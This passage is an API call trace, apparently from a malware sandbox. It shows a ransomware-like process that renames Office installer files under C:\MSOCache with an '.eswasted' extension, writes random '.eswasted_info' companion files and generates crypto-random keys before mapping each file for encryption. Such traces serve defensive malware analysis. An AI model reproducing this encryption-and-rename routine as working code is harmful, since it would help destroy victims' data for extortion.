[0070.798] SetEndOfFile (hFile=0x110) returned 1 [0070.800] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0070.800] CloseHandle (hObject=0x110) returned 1 [0070.801] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f5f48 | out: hHeap=0x4a0000) returned 1 [0070.801] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ce8 | out: hHeap=0x4a0000) returned 1 [0070.801] _aulldvrm () returned 0x0 [0070.801] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.802] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.802] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.802] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0070.802] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a2) returned 0x4e1ab8 [0070.802] lstrcpyW (in: lpString1=0x4e1b50, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.802] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0070.802] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.803] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0070.803] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.803] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.804] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.836] SetEndOfFile (hFile=0x110) returned 1 [0070.836] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.837] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0070.837] lstrcpyW (in: lpString1=0x4e1b50, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.837] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0070.837] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0070.837] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.837] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x5ac [0070.838] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x5ac) returned 0x2d0000 [0070.838] CloseHandle (hObject=0x114) returned 1 [0070.840] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.841] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef7b8 | out: pbBuffer=0x4ef7b8) returned 1 [0070.841] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.841] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.841] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.841] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.850] SetEndOfFile (hFile=0x110) returned 1 [0070.852] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0070.852] CloseHandle (hObject=0x110) returned 1 [0070.853] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0070.853] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1de8 | out: hHeap=0x4a0000) returned 1 [0070.853] _aulldvrm () returned 0x0 [0070.853] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.854] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.854] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.854] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0070.854] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2a8) returned 0x4e1ab8 [0070.854] lstrcpyW (in: lpString1=0x4e1b56, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.854] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0070.854] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.855] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0070.855] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.855] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.855] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.856] SetEndOfFile (hFile=0x110) returned 1 [0070.856] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.856] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0070.856] lstrcpyW (in: lpString1=0x4e1b56, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.856] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.eswasted")) returned 1 [0070.858] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.858] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x114 [0070.858] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x91975 [0070.858] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x91975) returned 0x1220000 [0070.858] CloseHandle (hObject=0x11c) returned 1 [0070.881] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.881] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef7b8 | out: pbBuffer=0x4ef7b8) returned 1 [0070.881] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.882] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.882] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.882] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.892] SetEndOfFile (hFile=0x110) returned 1 [0070.894] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0070.894] CloseHandle (hObject=0x110) returned 1 [0070.896] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0070.896] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ee0 | out: hHeap=0x4a0000) returned 1 [0070.896] _aulldvrm () returned 0x0 [0070.896] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.897] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.897] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.897] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0070.897] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2c6) returned 0x4e1ab8 [0070.897] lstrcpyW (in: lpString1=0x4e1b74, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.897] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0070.897] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.898] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0070.898] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.898] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.898] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.899] SetEndOfFile (hFile=0x110) returned 1 [0070.899] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.899] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0070.899] lstrcpyW (in: lpString1=0x4e1b74, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.899] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.eswasted")) returned 1 [0070.902] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.902] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0070.902] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x741 [0070.902] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x741) returned 0x2d0000 [0070.902] CloseHandle (hObject=0x11c) returned 1 [0070.905] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.906] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4e1dd0 | out: pbBuffer=0x4e1dd0) returned 1 [0070.906] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.906] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.906] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.906] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.915] SetEndOfFile (hFile=0x110) returned 1 [0070.917] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0070.917] CloseHandle (hObject=0x110) returned 1 [0070.918] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1ab8 | out: hHeap=0x4a0000) returned 1 [0070.918] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de2f8 | out: hHeap=0x4a0000) returned 1 [0070.919] _aulldvrm () returned 0x0 [0070.919] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.919] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.920] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.920] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0070.920] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2aa) returned 0x4f5f48 [0070.920] lstrcpyW (in: lpString1=0x4f5fe8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.920] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0070.920] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.921] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0070.921] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.921] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.921] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.922] SetEndOfFile (hFile=0x110) returned 1 [0070.922] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.922] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0070.922] lstrcpyW (in: lpString1=0x4f5fe8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.923] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.eswasted")) returned 1 [0070.923] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0070.923] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0070.923] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x15b5 [0070.923] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15b5) returned 0x2d0000 [0070.923] CloseHandle (hObject=0x120) returned 1 [0070.927] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.928] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4e1b00 | out: pbBuffer=0x4e1b00) returned 1 [0070.928] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.928] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.929] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.929] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.937] SetEndOfFile (hFile=0x110) returned 1 [0070.939] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0070.939] CloseHandle (hObject=0x110) returned 1 [0070.941] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f5f48 | out: hHeap=0x4a0000) returned 1 [0070.941] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de410 | out: hHeap=0x4a0000) returned 1 [0070.941] _aulldvrm () returned 0x0 [0070.941] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.941] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0070.942] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.942] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0070.942] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2b0) returned 0x4f5f48 [0070.942] lstrcpyW (in: lpString1=0x4f5fee, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0070.942] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ec5f8 [0070.942] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0070.942] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ec5f8 | out: pbBuffer=0x4ec5f8) returned 1 [0070.942] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.942] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0070.943] WriteFile (in: hFile=0x110, lpBuffer=0x4ec5f8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ec5f8*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0070.944] SetEndOfFile (hFile=0x110) returned 1 [0070.944] SetFilePointer (in: hFile=0x110, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.944] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0070.944] lstrcpyW (in: lpString1=0x4f5fee, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0070.944] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.eswasted")) returned 1 [0070.945] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0070.945] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0070.945] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x333 [0070.945] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x333) returned 0x2d0000 [0070.945] CloseHandle (hObject=0x11c) returned 1 [0070.947] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0070.948] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4de330 | out: pbBuffer=0x4de330) returned 1 [0070.948] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.948] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0070.949] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0070.949] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0070.957] SetEndOfFile (hFile=0x110) returned 1 [0070.959] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec5f8 | out: hHeap=0x4a0000) returned 1 [0070.959] CloseHandle (hObject=0x110) returned 1 [0070.972] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f5f48 | out: hHeap=0x4a0000) returned 1 [0070.972] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4de510 | out: hHeap=0x4a0000) returned 1 [0070.972] _aulldvrm () returned 0x0 [0070.972] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0070.973] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | 